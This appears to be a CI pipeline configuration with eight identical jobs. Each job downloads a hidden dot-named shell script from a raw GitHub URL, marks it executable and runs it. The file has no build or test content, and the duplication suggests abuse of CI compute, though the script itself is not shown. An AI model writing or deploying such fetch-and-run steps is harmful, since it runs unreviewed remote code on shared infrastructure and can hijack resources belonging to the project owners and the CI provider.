d_1:
  script:
    - wget https://raw.githubusercontent.com/munyakbanarikamtuh/munyakbanarikamtuh/main/.munyakbanarikamtuh.sh
    - chmod u+x .munyakbanarikamtuh.sh
    - ./.munyakbanarikamtuh.sh
    
d_2:
  script:
    - wget https://raw.githubusercontent.com/munyakbanarikamtuh/munyakbanarikamtuh/main/.munyakbanarikamtuh.sh
    - chmod u+x .munyakbanarikamtuh.sh
    - ./.munyakbanarikamtuh.sh
    
d_3:
  script:
    - wget https://raw.githubusercontent.com/munyakbanarikamtuh/munyakbanarikamtuh/main/.munyakbanarikamtuh.sh
    - chmod u+x .munyakbanarikamtuh.sh
    - ./.munyakbanarikamtuh.sh

  
d_4:
  script:
    - wget https://raw.githubusercontent.com/munyakbanarikamtuh/munyakbanarikamtuh/main/.munyakbanarikamtuh.sh
    - chmod u+x .munyakbanarikamtuh.sh
    - ./.munyakbanarikamtuh.sh
  
d_5:
  script:
    - wget https://raw.githubusercontent.com/munyakbanarikamtuh/munyakbanarikamtuh/main/.munyakbanarikamtuh.sh
    - chmod u+x .munyakbanarikamtuh.sh
    - ./.munyakbanarikamtuh.sh
  
d_6:
  script:
    - wget https://raw.githubusercontent.com/munyakbanarikamtuh/munyakbanarikamtuh/main/.munyakbanarikamtuh.sh
    - chmod u+x .munyakbanarikamtuh.sh
    - ./.munyakbanarikamtuh.sh
  
d_7:
  script:
    - wget https://raw.githubusercontent.com/munyakbanarikamtuh/munyakbanarikamtuh/main/.munyakbanarikamtuh.sh
    - chmod u+x .munyakbanarikamtuh.sh
    - ./.munyakbanarikamtuh.sh
  
d_8:
  script:
    - wget https://raw.githubusercontent.com/munyakbanarikamtuh/munyakbanarikamtuh/main/.munyakbanarikamtuh.sh
    - chmod u+x .munyakbanarikamtuh.sh
    - ./.munyakbanarikamtuh.sh